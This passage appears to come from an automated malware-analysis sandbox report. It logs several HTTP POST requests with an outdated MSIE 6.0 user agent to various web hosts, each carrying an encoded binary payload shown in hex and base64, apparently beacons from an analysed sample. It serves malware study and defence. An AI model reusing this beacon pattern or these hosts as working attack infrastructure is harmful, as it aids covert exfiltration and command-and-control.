58 33 71 72 32 69 70 77 33 71 78 48 6b 6a 4e 4b 4e 37 70 33 73 78 41 58 63 58 2f 38 71 49 4a 6f 33 61 35 6d 2b 50 6b 37 34 64 38 32 6d 37 69 59 63 4b 54 4f 76 58 54 53 34 76 6a 75 30 66 7a 66 62 66 58 2b 69 41 35 78 51 4e 2b 6d 48 4c 79 50 6a 41 67 63 67 2b 51 75 34 65 42 36 34 56 6c 2f 4a 4f 51 54 66 69 73 69 69 78 52 45 6c 6e 67 43 64 47 50 39 53 69 55 49 4c 4c 68 2b 2f 6b 49 4b 4c 74 74 53 55 76 65 4c 49 6a 45 56 5a 4d 67 70 53 34 59 2b 76 4e 56 2b 47 74 31 76 59 6e 56 55 35 7a 71 52 74 6c 33 78 62 42 41 62 65 68 65 57 4e 6e 48 74 67 32 61 50 31 4c 66 44 6a 67 7a 36 73 45 36 4a 78 7a 41 78 37 67 3d 3d Data Ascii: gROtFqRDbpfRrJf5P7r/dnfCSWdc1WKpGDv6qyQTg3FQTYzj4IQvTIKzAyFiv4qpxyKY4hVUkwKpDg3AtzEHvvIt+oX2N1Yolq7L2FL16Ys6rIciNR+GhuWmV93Ix8YSuyiR/wAZVHAqij1dhOWC/X1a2dkK1X7IjLf9j0CoYgJQidyixKYGrINNwl5c3kCy8vEWR+YTnmCX6THRoZhJ9BXJMbBVjl5B/WyUQFf4oDLQ9yjojufjW/KB888NfuxKHiHwkz3zCkeaxQMt8Y0LLtRCkBFrV3hnOx4Fc4EbtSmTMjm6kjX1S4x4E0Qlnsux1IHcJoXBGuJHX3qr2ipw3qxHkjNKN7p3sxAXcX/8qIJo3a5m+Pk74d82m7iYcKTOvXTS4vju0fzfbfX+iA5xQN+mHLyPjAgcg+Qu4eB64Vl/JOQTfisiixRElngCdGP9SiUILLh+/kIKLttSUveLIjEVZMgpS4Y+vNV+Gt1vYnVU5zqRtl3xbBAbeheWNnHtg2aP1LfDjgz6sE6JxzAx7g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 39 32 79 69 72 30 59 37 63 35 63 77 7a 70 4c 57 59 64 6d 38 6f 47 6c 77 2f 2b 79 6d 57 69 55 35 32 71 76 51 35 39 53 74 4c 4e 4c 62 48 45 48 43 77 34 6e 48 70 38 67 6d 6d 6d 69 4c 64 43 6f 65 69 79 65 4d 4c 45 37 6b 7a 61 78 67 34 70 4d 63 55 4d 2b 46 67 55 52 6f 35 4d 61 47 69 44 75 4f 4f 53 63 45 52 31 51 75 63 46 33 46 42 77 32 39 30 58 37 4f 32 35 56 6f 36 33 55 61 4b 4d 55 57 58 78 79 6a 63 43 48 36 6d 7a 51 36 57 62 62 2b 58 36 71 4b 43 44 58 43 36 36 63 41 56 51 54 51 62 2f 54 38 63 41 47 47 2f 66 6a 36 56 78 54 32 47 63 37 4d 76 42 74 77 4f 66 44 4b 5a 79 79 37 2b 56 33 33 62 61 52 4f 4f 30 6c 72 46 51 53 79 36 67 58 76 37 6e 71 75 69 37 54 2f 43 37 4d 51 6b 51 70 75 75 4f 32 43 57 44 41 4e 75 7a 72 77 53 35 2b 69 51 56 45 74 30 6f 64 2f 41 49 65 75 6a 71 4e 50 6a 53 39 63 4f 42 41 77 77 67 6d 58 4e 47 31 59 44 4f 69 33 7a 53 4d 77 52 6a 4b 6f 34 4a 7a 71 51 44 63 38 77 36 67 6d 43 6f 49 62 54 55 6d 63 6c 4e 35 64 4e 30 48 39 61 68 50 43 36 6f 45 42 59 66 37 4e 30 48 31 45 34 68 6f 58 33 6b 5a 52 6c 71 48 74 4f 78 34 4d 6d 48 49 65 46 64 55 73 44 65 76 62 67 2b 45 53 79 4f 45 4b 4e 64 6e 43 74 6d 2f 65 30 76 47 69 66 30 79 58 32 55 35 67 6e 54 63 31 51 64 77 62 77 66 50 58 6c 33 34 37 6b 7a 6f 61 44 56 45 65 65 65 79 6f 79 4b 47 53 69 7a 75 34 41 76 36 75 47 42 68 32 6f 52 79 4d 62 34 72 43 58 77 44 68 70 65 61 38 53 64 4b 46 36 78 67 51 30 72 4a 6b 55 53 36 2f 78 52 4e 66 4d 54 54 49 70 42 41 30 4f 32 62 32 51 34 66 30 59 30 74 62 57 31 70 4b 74 4a 53 73 4e 66 50 38 4e 55 65 54 79 5a 53 69 2f 67 39 76 68 70 5a 63 6c 33 56 6d 62 4e 4f 73 50 50 43 69 46 61 76 41 4b 4c 7a 42 48 7a 57 46 67 51 44 47 4e 4e 68 36 52 4b 32 55 66 34 4c 35 43 41 3d 3d Data Ascii: 92yir0Y7c5cwzpLWYdm8oGlw/+ymWiU52qvQ59StLNLbHEHCw4nHp8gmmmiLdCoeiyeMLE7kzaxg4pMcUM+FgURo5MaGiDuOOScER1QucF3FBw290X7O25Vo63UaKMUWXxyjcCH6mzQ6Wbb+X6qKCDXC66cAVQTQb/T8cAGG/fj6VxT2Gc7MvBtwOfDKZyy7+V33baROO0lrFQSy6gXv7nqui7T/C7MQkQpuuO2CWDANuzrwS5+iQVEt0od/AIeujqNPjS9cOBAwwgmXNG1YDOi3zSMwRjKo4JzqQDc8w6gmCoIbTUmclN5dN0H9ahPC6oEBYf7N0H1E4hoX3kZRlqHtOx4MmHIeFdUsDevbg+ESyOEKNdnCtm/e0vGif0yX2U5gnTc1QdwbwfPXl347kzoaDVEeeeyoyKGSizu4Av6uGBh2oRyMb4rCXwDhpea8SdKF6xgQ0rJkUS6/xRNfMTTIpBA0O2b2Q4f0Y0tbW1pKtJSsNfP8NUeTyZSi/g9vhpZcl3VmbNOsPPCiFavAKLzBHzWFgQDGNNh6RK2Uf4L5CA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 4e 50 6a 73 6e 69 42 67 61 70 65 73 34 2f 4a 35 63 35 52 43 73 6c 4d 63 46 56 36 49 51 5a 68 6a 56 41 45 57 2b 6c 52 42 38 44 5a 39 4b 6e 49 45 63 33 38 46 4e 47 38 70 56 4a 42 6d 4b 4e 64 61 73 2b 67 38 78 61 70 4c 67 63 68 46 50 6a 46 33 43 77 43 53 77 42 69 4c 72 4f 43 74 35 2b 52 48 5a 51 72 66 2b 47 37 69 30 65 32 30 50 33 42 5a 47 34 63 4d 57 30 53 72 4f 39 67 37 64 32 64 58 48 4b 6e 52 56 4c 75 4a 6e 34 37 31 4e 35 2f 75 74 79 4f 79 71 33 64 2f 64 42 31 36 46 74 58 30 67 72 56 31 63 54 38 38 70 38 33 6c 30 70 70 6b 65 75 47 38 47 59 67 53 41 4c 31 58 32 6e 35 6b 53 67 53 46 37 42 78 68 4e 34 55 62 6a 74 43 50 33 34 55 34 50 7a 30 38 2f 73 78 54 78 6e 68 4b 37 6c 69 33 44 69 54 54 46 72 54 6f 75 74 76 59 6e 79 4f 75 45 63 2f 2b 64 44 59 32 6d 39 69 45 48 68 74 49 55 6e 62 70 35 6d 47 66 6d 50 79 30 77 37 61 30 7a 33 74 37 43 5a 71 31 62 35 34 6d 51 58 41 47 6d 50 47 43 53 73 34 53 39 59 55 56 66 78 75 74 50 4e 42 45 71 6e 7a 77 48 31 37 6d 2b 48 4a 47 5a 6e 4d 35 48 4c 37 56 6e 56 4a 69 4a 34 61 46 30 30 64 68 4a 41 49 38 63 64 6d 33 65 59 78 57 35 35 35 69 59 70 34 6b 6b 32 53 52 73 50 38 51 78 31 30 78 63 52 65 7a 4e 50 4f 31 43 76 50 57 72 4b 38 39 70 7a 77 79 38 4c 6b 76 58 43 47 32 52 53 72 79 38 2f 42 75 33 63 41 45 6b 49 4c 48 6b 49 4a 79 30 49 72 65 53 2b 45 77 6a 38 65 6c 5a 6f 46 6c 47 42 36 7a 35 4c 77 52 30 4a 74 49 31 35 54 56 4b 63 44 6c 32 74 44 32 72 74 38 48 75 33 4e 5a 2f 50 76 64 6d 46 45 71 48 31 7a 5a 71 35 59 75 69 46 4d 68 54 6c 63 4d 35 4e 4c 4c 4f 71 78 2f 7a 52 73 73 6c 64 65 59 4d 4e 70 76 4e 77 4e 37 78 34 38 53 76 37 61 4c 68 70 63 74 70 62 35 6e 37 58 73 4e 37 51 68 38 76 4d 43 4b 2f 49 2f 4f 44 64 41 56 49 59 72 71 78 38 72 59 38 37 6b 32 71 54 37 55 79 6d 4c 33 6e 70 4e 71 59 55 55 42 68 77 3d 3d Data Ascii: NPjsniBgapes4/J5c5RCslMcFV6IQZhjVAEW+lRB8DZ9KnIEc38FNG8pVJBmKNdas+g8xapLgchFPjF3CwCSwBiLrOCt5+RHZQrf+G7i0e20P3BZG4cMW0SrO9g7d2dXHKnRVLuJn471N5/utyOyq3d/dB16FtX0grV1cT88p83l0ppkeuG8GYgSAL1X2n5kSgSF7BxhN4UbjtCP34U4Pz08/sxTxnhK7li3DiTTFrToutvYnyOuEc/+dDY2m9iEHhtIUnbp5mGfmPy0w7a0z3t7CZq1b54mQXAGmPGCSs4S9YUVfxutPNBEqnzwH17m+HJGZnM5HL7VnVJiJ4aF00dhJAI8cdm3eYxW555iYp4kk2SRsP8Qx10xcRezNPO1CvPWrK89pzwy8LkvXCG2RSry8/Bu3cAEkILHkIJy0IreS+Ewj8elZoFlGB6z5LwR0JtI15TVKcDl2tD2rt8Hu3NZ/PvdmFEqH1zZq5YuiFMhTlcM5NLLOqx/zRssldeYMNpvNwN7x48Sv7aLhpctpb5n7XsN7Qh8vMCK/I/ODdAVIYrqx8rY87k2qT7UymL3npNqYUUBhw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 4b 55 6e 79 4e 64 6d 58 64 35 63 69 45 37 36 39 36 42 38 7a 61 48 4a 68 54 66 59 33 75 6a 64 4b 48 59 42 4d 78 71 31 50 6a 79 38 51 59 43 37 52 45 53 33 52 56 4f 30 4c 42 6f 77 53 48 53 31 55 76 74 54 6c 37 43 38 35 37 79 43 43 4f 7a 66 4d 76 46 70 69 74 54 61 74 77 6c 32 66 6a 4d 35 69 56 6e 58 7a 30 72 33 73 63 42 4a 79 73 55 2b 6d 4b 30 34 67 32 39 70 6c 72 56 51 6d 46 62 38 77 4f 49 38 37 67 58 75 77 33 41 77 73 68 61 76 59 35 37 62 50 70 4a 46 6a 6b 73 48 71 58 63 50 46 56 63 51 2b 50 7a 41 65 61 57 38 32 6b 74 78 64 52 79 33 6f 45 36 64 4d 35 4c 32 2b 52 50 63 73 42 51 61 55 4f 77 6d 6e 6a 4d 46 59 51 55 49 66 67 72 59 77 62 55 47 62 47 64 50 63 6f 31 31 66 43 31 4e 33 55 79 46 61 34 45 7a 69 61 79 4f 47 65 4d 43 36 58 36 5a 72 55 78 68 77 57 52 4a 32 70 61 49 64 35 6b 35 54 36 45 74 76 49 47 53 31 36 59 79 6a 61 35 71 72 43 46 4e 71 30 64 50 37 2b 63 63 65 2f 6b 46 39 62 2b 59 4b 4a 6a 39 6b 36 2b 76 2b 62 76 63 65 47 33 4c 69 78 30 32 4f 31 46 33 48 36 57 66 6c 37 77 72 4e 4e 45 6b 69 77 4f 47 59 51 33 75 50 4d 76 6b 30 6d 68 69 2b 4f 4b 70 63 4f 6b 4b 62 4b 4c 39 6b 59 63 5a 6e 52 75 6e 52 4a 62 4a 30 31 74 5a 61 72 63 4d 65 2f 48 4f 48 42 73 6d 43 41 74 41 73 2f 79 47 72 78 50 31 33 49 42 59 4a 41 6e 4b 58 71 35 65 51 64 39 46 66 31 79 53 4b 2f 77 66 6b 4e 51 6f 75 50 4c 77 5a 54 4b 6e 46 44 36 4b 6b 51 42 76 39 58 70 32 39 4b 58 4f 48 58 45 37 62 55 50 67 32 37 47 6f 69 36 72 6d 56 4f 70 6e 6f 6f 59 51 45 65 61 73 76 77 36 53 54 74 36 79 4f 6d 34 2b 45 59 51 7a 42 6a 30 30 57 35 31 59 76 2f 6b 7a 51 52 78 64 65 64 2f 4a 56 69 71 56 47 79 7a 61 4f 36 6d 44 42 64 69 34 59 75 4a 66 6c 62 4a 41 50 38 46 65 2b 41 41 35 72 55 54 55 62 4f 32 4c 6e 74 6f 58 71 65 6d 69 70 70 6e 71 48 4f 61 2f 5a 35 45 53 5a 55 44 4f 4c 30 67 3d 3d Data Ascii: KUnyNdmXd5ciE7696B8zaHJhTfY3ujdKHYBMxq1Pjy8QYC7RES3RVO0LBowSHS1UvtTl7C857yCCOzfMvFpitTatwl2fjM5iVnXz0r3scBJysU+mK04g29plrVQmFb8wOI87gXuw3AwshavY57bPpJFjksHqXcPFVcQ+PzAeaW82ktxdRy3oE6dM5L2+RPcsBQaUOwmnjMFYQUIfgrYwbUGbGdPco11fC1N3UyFa4EziayOGeMC6X6ZrUxhwWRJ2paId5k5T6EtvIGS16Yyja5qrCFNq0dP7+cce/kF9b+YKJj9k6+v+bvceG3Lix02O1F3H6Wfl7wrNNEkiwOGYQ3uPMvk0mhi+OKpcOkKbKL9kYcZnRunRJbJ01tZarcMe/HOHBsmCAtAs/yGrxP13IBYJAnKXq5eQd9Ff1ySK/wfkNQouPLwZTKnFD6KkQBv9Xp29KXOHXE7bUPg27Goi6rmVOpnooYQEeasvw6STt6yOm4+EYQzBj00W51Yv/kzQRxded/JViqVGyzaO6mDBdi4YuJflbJAP8Fe+AA5rUTUbO2LntoXqemippnqHOa/Z5ESZUDOL0g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 49 69 49 46 6f 79 71 43 61 70 64 48 65 4a 36 65 44 55 76 4f 45 75 30 73 6c 38 4a 61 4e 64 72 76 2f 6c 61 61 69 56 43 47 37 48 54 43 57 67 39 57 48 73 53 5a 4a 67 43 31 74 31 75 2f 76 4a 77 6c 5a 76 73 75 75 6b 7a 30 58 4d 70 74 4c 37 76 68 69 62 30 58 31 70 78 4e 6f 43 32 69 49 62 6b 4f 43 4e 69 70 78 55 67 56 42 61 66 38 58 35 47 33 6f 6d 45 63 59 35 67 37 36 32 37 44 71 76 52 67 6b 57 57 72 55 48 69 2f 73 72 52 35 6e 6a 42 36 4b 58 55 4a 4e 43 44 78 6d 32 4b 35 6a 72 4c 55 31 62 37 67 5a 32 75 35 39 4d 50 43 75 59 68 41 43 57 35 4c 4f 58 48 7a 4d 70 79 78 66 50 4e 44 4e 6f 33 46 67 63 62 43 38 58 73 77 46 49 58 4d 4f 66 45 56 2b 35 6f 2f 38 2b 66 70 73 57 58 56 2b 63 6f 51 6c 61 64 55 33 67 55 48 7a 31 55 61 6c 4c 62 4b 56 59 67 6a 63 51 57 4b 37 4e 35 46 66 63 4c 38 39 37 6e 6f 39 64 32 74 74 2f 79 6d 46 56 66 4e 6d 4b 61 49 62 52 71 4b 63 34 2b 4a 70 6d 45 74 75 48 39 74 2b 70 78 65 61 61 42 39 46 52 5a 51 76 4b 67 66 56 77 6e 4d 68 4f 62 38 53 73 6f 38 44 33 41 50 57 77 56 54 53 52 2b 49 2f 63 31 64 41 65 38 62 6f 55 59 62 31 68 59 46 71 39 68 55 4c 68 49 37 42 42 33 6b 59 57 79 75 43 72 32 42 52 56 7a 74 37 38 4d 64 77 63 6c 6d 50 65 59 68 57 78 4f 67 30 2f 67 68 4e 71 38 76 57 58 7a 49 66 54 46 4a 4f 5a 7a 43 6d 53 4e 4a 38 6b 5a 53 70 59 4d 65 2b 61 66 6d 6c 44 2b 53 71 32 35 64 31 39 34 68 35 37 4d 6c 54 7a 64 56 72 6f 36 76 63 35 5a 79 50 66 55 36 64 75 68 52 45 2f 73 4e 70 72 56 39 5a 4b 6e 39 6c 5a 4f 58 75 62 4c 69 53 55 45 75 34 2f 6e 30 70 6d 31 47 2f 31 4f 54 74 54 32 68 73 2b 70 61 2f 6d 4c 57 78 50 6c 43 55 62 2f 57 68 6c 50 78 75 47 77 36 2f 50 6c 44 7a 63 6f 33 38 38 31 6f 50 6f 38 4f 61 2f 55 34 37 4a 36 51 57 62 58 75 5a 77 3d 3d Data Ascii: IiIFoyqCapdHeJ6eDUvOEu0sl8JaNdrv/laaiVCG7HTCWg9WHsSZJgC1t1u/vJwlZvsuukz0XMptL7vhib0X1pxNoC2iIbkOCNipxUgVBaf8X5G3omEcY5g7627DqvRgkWWrUHi/srR5njB6KXUJNCDxm2K5jrLU1b7gZ2u59MPCuYhACW5LOXHzMpyxfPNDNo3FgcbC8XswFIXMOfEV+5o/8+fpsWXV+coQladU3gUHz1UalLbKVYgjcQWK7N5FfcL897no9d2tt/ymFVfNmKaIbRqKc4+JpmEtuH9t+pxeaaB9FRZQvKgfVwnMhOb8Sso8D3APWwVTSR+I/c1dAe8boUYb1hYFq9hULhI7BB3kYWyuCr2BRVzt78MdwclmPeYhWxOg0/ghNq8vWXzIfTFJOZzCmSNJ8kZSpYMe+afmlD+Sq25d194h57MlTzdVro6vc5ZyPfU6duhRE/sNprV9ZKn9lZOXubLiSUEu4/n0pm1G/1OTtT2hs+pa/mLWxPlCUb/WhlPxuGw6/PlDzco3881oPo8Oa/U47J6QWbXuZw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 68 38 31 73 4e 44 57 4c 64 35 66 6b 45 4c 46 61 6e 43 4d 6c 4a 79 34 5a 32 6e 48 44 5a 75 36 53 4f 56 74 59 2f 66 6e 69 62 4c 36 35 53 2f 69 6f 69 77 50 66 41 6e 77 63 42 78 62 48 71 35 4b 6e 63 41 30 6d 6b 4e 77 2f 79 6f 57 70 65 6d 47 63 6c 4a 52 76 51 61 48 6d 64 6a 38 58 76 6e 53 63 50 34 55 38 36 53 35 6a 2b 4b 6b 4b 7a 78 4a 63 69 71 6a 44 53 49 58 54 43 75 4f 4e 65 74 49 58 4d 4b 6f 64 51 51 43 56 36 79 61 79 4b 63 63 45 59 6c 33 36 34 42 44 39 58 66 38 44 4b 42 6a 73 6c 32 63 6f 4e 76 35 73 5a 64 52 57 70 56 61 2b 6f 69 4c 59 54 76 44 50 35 4c 44 4e 70 34 50 70 37 4f 5a 63 71 2f 6d 51 58 4d 68 31 43 6f 39 6c 4e 35 2f 43 79 4e 67 73 57 32 77 79 4c 31 64 6c 32 4b 35 61 73 2f 36 7a 72 70 72 37 48 37 56 35 42 59 76 43 48 51 57 52 56 4a 39 31 46 33 61 73 66 4f 73 41 2f 65 71 4d 2f 66 72 53 52 2f 7a 6b 43 53 53 55 46 37 6f 6e 71 38 75 30 73 69 68 78 42 67 4c 2f 51 33 65 68 4b 6f 4e 4b 55 61 42 59 5a 38 6d 59 58 70 36 51 32 69 79 70 48 5a 75 59 4e 41 6b 34 36 2f 6e 4d 79 4b 32 51 4b 31 78 75 41 52 49 71 4c 6e 33 31 2f 7a 41 6e 45 63 66 39 65 79 74 42 69 36 4e 50 67 61 4e 38 48 57 61 75 33 4a 6f 72 68 4f 6c 37 71 4a 51 33 58 43 61 51 37 52 6a 50 33 63 4f 51 36 34 57 6d 62 5a 50 30 55 71 41 35 71 7a 32 78 6f 4e 6e 63 4c 4f 6b 4d 61 41 4a 2b 72 75 47 6c 53 6e 73 78 47 64 4e 47 63 4c 2f 32 50 6c 4d 75 39 7a 45 47 79 46 69 71 41 41 73 43 6c 33 39 36 65 33 44 32 2f 5a 34 55 46 38 69 70 47 68 2b 2b 53 35 34 6c 6b 56 62 75 50 51 33 69 58 7a 70 47 76 2b 2b 6f 2b 52 42 4a 32 63 54 78 52 69 4b 36 61 7a 69 70 51 6b 2b 6a 6f 76 31 56 50 76 7a 73 53 4a 65 57 4c 56 57 53 6f 6e 6f 44 78 79 51 58 43 4a 66 68 61 78 59 67 31 36 68 55 72 55 4c 63 46 76 5a 4a 45 46 50 32 48 67 3d 3d Data Ascii: h81sNDWLd5fkELFanCMlJy4Z2nHDZu6SOVtY/fnibL65S/ioiwPfAnwcBxbHq5KncA0mkNw/yoWpemGclJRvQaHmdj8XvnScP4U86S5j+KkKzxJciqjDSIXTCuONetIXMKodQQCV6yayKccEYl364BD9Xf8DKBjsl2coNv5sZdRWpVa+oiLYTvDP5LDNp4Pp7OZcq/mQXMh1Co9lN5/CyNgsW2wyL1dl2K5as/6zrpr7H7V5BYvCHQWRVJ91F3asfOsA/eqM/frSR/zkCSSUF7onq8u0sihxBgL/Q3ehKoNKUaBYZ8mYXp6Q2iypHZuYNAk46/nMyK2QK1xuARIqLn31/zAnEcf9eytBi6NPgaN8HWau3JorhOl7qJQ3XCaQ7RjP3cOQ64WmbZP0UqA5qz2xoNncLOkMaAJ+ruGlSnsxGdNGcL/2PlMu9zEGyFiqAAsCl396e3D2/Z4UF8ipGh++S54lkVbuPQ3iXzpGv++o+RBJ2cTxRiK6azipQk+jov1VPvzsSJeWLVWSonoDxyQXCJfhaxYg16hUrULcFvZJEFP2Hg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.com-sit.comCache-Control: no-cacheData Raw: 35 30 64 47 71 4a 4f 65 67 35 64 58 42 39 53 42 57 70 4b 6e 32 7a 79 75 57 48 39 35 61 49 58 61 64 32 30 58 58 78 62 64 78 5a 57 55 45 51 49 78 67 75 6b 34 6d 53 4c 70 59 67 37 71 4e 79 69 70 4c 54 49 73 65 61 76 70 6b 79 79 33 72 33 46 6b 62 31 35 56 38 71 2f 53 4a 33 43 5a 70 50 77 69 48 78 37 53 4c 65 6a 47 52 6e 66 49 54 37 65 61 6f 33 76 51 58 38 48 7a 31 57 55 44 70 75 4d 6f 45 31 6c 2b 6f 35 50 4e 7a 55 31 76 7a 2f 73 38 33 77 66 6f 71 48 63 70 5a 41 6f 74 42 6c 4e 63 63 65 5a 54 48 49 66 55 47 52 52 57 56 32 36 56 67 67 4f 6d 4a 56 42 71 33 49 6e 31 77 4c 45 38 78 74 65 5a 69 67 73 38 78 2b 39 76 71 73 45 6b 77 55 52 48 6e 6e 32 68 37 73 6a 49 54 30 39 4f 63 44 79 33 72 46 58 6f 43 2b 46 6b 30 4b 41 77 68 6b 64 54 62 30 57 6f 65 75 66 58 73 33 45 64 4c 41 7a 55 69 5a 56 37 55 61 6b 4a 53 54 49 47 6d 55 61 4b 78 79 6d 62 52 51 51 63 39 37 52 58 69 59 2b 36 4f 4f 6f 4e 45 69 41 4a 70 79 48 30 46 37 33 64 42 62 67 70 77 67 7a 71 31 33 48 78 39 48 4d 6b 6d 6d 6b 55 74 4a 42 56 49 62 45 4d 4d 41 69 72 73 55 58 4c 4d 34 6f 6d 6c 70 55 76 49 32 78 2f 6a 6f 56 51 50 61 52 76 77 62 69 50 38 39 47 4c 2f 35 41 50 37 69 6f 6f 45 58 70 74 6d 38 31 5a 46 63 33 73 50 50 4b 34 79 53 4e 32 53 44 6c 58 6b 5a 4c 52 51 35 6b 76 57 73 51 4a 6f 78 46 67 46 71 36 4b 41 31 57 4d 79 69 32 48 49 4e 56 4a 4d 39 33 4b 50 65 39 72 43 63 50 51 47 48 63 68 69 6e 59 64 42 44 4c 50 74 4d 75 70 45 4b 6b 53 79 72 64 4e 41 78 50 49 53 6f 52 2f 48 38 57 35 7a 61 53 4c 45 62 33 44 4b 79 70 4a 4b 5a 50 79 47 75 79 74 34 44 53 4d 32 68 37 49 73 49 42 59 48 56 79 70 31 2b 2b 62 63 7a 32 51 68 54 39 2f 64 71 69 69 59 63 48 57 54 45 41 48 56 4d 58 76 43 4f 76 6a 77 6e 4d 3d Data Ascii: 50dGqJOeg5dXB9SBWpKn2zyuWH95aIXad20XXxbdxZWUEQIxguk4mSLpYg7qNyipLTIseavpkyy3r3Fkb15V8q/SJ3CZpPwiHx7SLejGRnfIT7eao3vQX8Hz1WUDpuMoE1l+o5PNzU1vz/s83wfoqHcpZAotBlNcceZTHIfUGRRWV26VggOmJVBq3In1wLE8xteZigs8x+9vqsEkwURHnn2h7sjIT09OcDy3rFXoC+Fk0KAwhkdTb0WoeufXs3EdLAzUiZV7UakJSTIGmUaKxymbRQQc97RXiY+6OOoNEiAJpyH0F73dBbgpwgzq13Hx9HMkmmkUtJBVIbEMMAirsUXLM4omlpUvI2x/joVQPaRvwbiP89GL/5AP7iooEXptm81ZFc3sPPK4ySN2SDlXkZLRQ5kvWsQJoxFgFq6KA1WMyi2HINVJM93KPe9rCcPQGHchinYdBDLPtMupEKkSyrdNAxPISoR/H8W5zaSLEb3DKypJKZPyGuyt4DSM2h7IsIBYHVyp1++bcz2QhT9/dqiiYcHWTEAHVMXvCOvjwnM=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 41 49 6c 72 75 37 77 39 68 4a 66 32 48 39 46 76 5a 2f 30 61 70 6b 39 34 37 44 68 55 56 63 70 4b 73 45 70 77 6d 71 56 7a 66 30 61 33 5a 4f 4e 32 74 33 35 63 43 31 33 77 6f 4f 48 5a 53 2b 4c 5a 70 74 6a 37 49 38 6f 44 51 37 54 4d 30 4f 46 4e 41 73 41 50 74 45 4b 55 56 6e 45 4d 39 4d 2f 35 78 4b 68 55 43 51 44 67 41 39 6a 66 79 66 2b 4b 45 6f 59 70 47 70 2b 32 48 78 50 33 48 6f 37 68 41 72 55 4a 2f 36 76 75 6a 4e 4b 48 54 36 54 4f 31 70 34 53 6b 66 44 37 58 44 69 36 4d 36 45 61 55 78 34 43 66 52 6e 51 6d 6f 32 6a 68 71 46 74 52 78 6b 50 5a 4a 64 75 72 76 6e 6f 42 79 46 74 58 39 34 42 58 51 6b 6f 33 4d 61 67 36 79 53 30 6c 66 78 50 4b 70 71 51 63 63 72 34 59 50 58 37 5a 52 66 72 36 30 4a 64 55 6e 6e 57 55 4c 41 6f 41 4e 66 4e 73 66 58 56 43 47 62 30 47 39 38 62 38 51 61 45 57 46 79 6e 2b 4d 65 57 6d 58 4d 63 51 53 57 58 42 74 4b 4e 6b 51 6f 6d 45 71 4b 47 61 62 76 30 4c 7a 2f 49 59 77 2f 44 4a 6d 43 6a 7a 75 36 43 6b 68 65 57 41 6d 6e 2b 30 47 58 58 48 6c 49 75 4d 46 5a 6c 66 4f 53 4d 6d 42 4a 76 54 65 38 2b 63 6d 39 62 79 41 7a 35 59 43 64 31 2f 33 59 51 53 50 48 54 45 6b 57 6e 4d 43 6f 77 34 46 75 33 53 38 74 6f 54 78 43 35 6d 31 64 30 73 55 48 6f 43 6c 69 4c 72 33 55 72 5a 48 35 6a 4c 57 4d 32 71 73 4e 51 6e 74 51 79 6d 43 78 78 57 47 75 59 2b 4c 49 76 6d 41 70 6d 75 59 54 44 78 4c 31 77 6b 77 33 57 74 44 61 73 4d 41 74 64 37 79 4e 4c 45 66 48 77 42 2b 6d 2b 4f 2f 76 2b 47 78 7a 6d 7a 70 35 6c 45 32 79 41 6e 54 39 48 7a 55 58 36 70 4d 30 32 31 46 38 71 68 62 51 46 43 48 37 75 41 71 73 78 57 38 72 66 44 56 43 51 53 72 36 4b 69 4d 52 2f 62 39 78 4b 50 49 71 65 37 33 68 4f 6e 35 70 66 39 42 57 41 4f 61 71 49 61 41 51 36 54 7a 33 39 2b 4b 4a 70 4f 54 30 71 38 32 2f 4a 2f 48 61 51 35 54 36 49 4e 2f 46 78 69 4d 46 38 68 55 35 5a 6c 6f 41 3d Data Ascii: AIlru7w9hJf2H9FvZ/0apk947DhUVcpKsEpwmqVzf0a3ZON2t35cC13woOHZS+LZptj7I8oDQ7TM0OFNAsAPtEKUVnEM9M/5xKhUCQDgA9jfyf+KEoYpGp+2HxP3Ho7hArUJ/6vujNKHT6TO1p4SkfD7XDi6M6EaUx4CfRnQmo2jhqFtRxkPZJdurvnoByFtX94BXQko3Mag6yS0lfxPKpqQccr4YPX7ZRfr60JdUnnWULAoANfNsfXVCGb0G98b8QaEWFyn+MeWmXMcQSWXBtKNkQomEqKGabv0Lz/IYw/DJmCjzu6CkheWAmn+0GXXHlIuMFZlfOSMmBJvTe8+cm9byAz5YCd1/3YQSPHTEkWnMCow4Fu3S8toTxC5m1d0sUHoCliLr3UrZH5jLWM2qsNQntQymCxxWGuY+LIvmApmuYTDxL1wkw3WtDasMAtd7yNLEfHwB+m+O/v+Gxzmzp5lE2yAnT9HzUX6pM021F8qhbQFCH7uAqsxW8rfDVCQSr6KiMR/b9xKPIqe73hOn5pf9BWAOaqIaAQ6Tz39+KJpOT0q82/J/HaQ5T6IN/FxiMF8hU5ZloA=
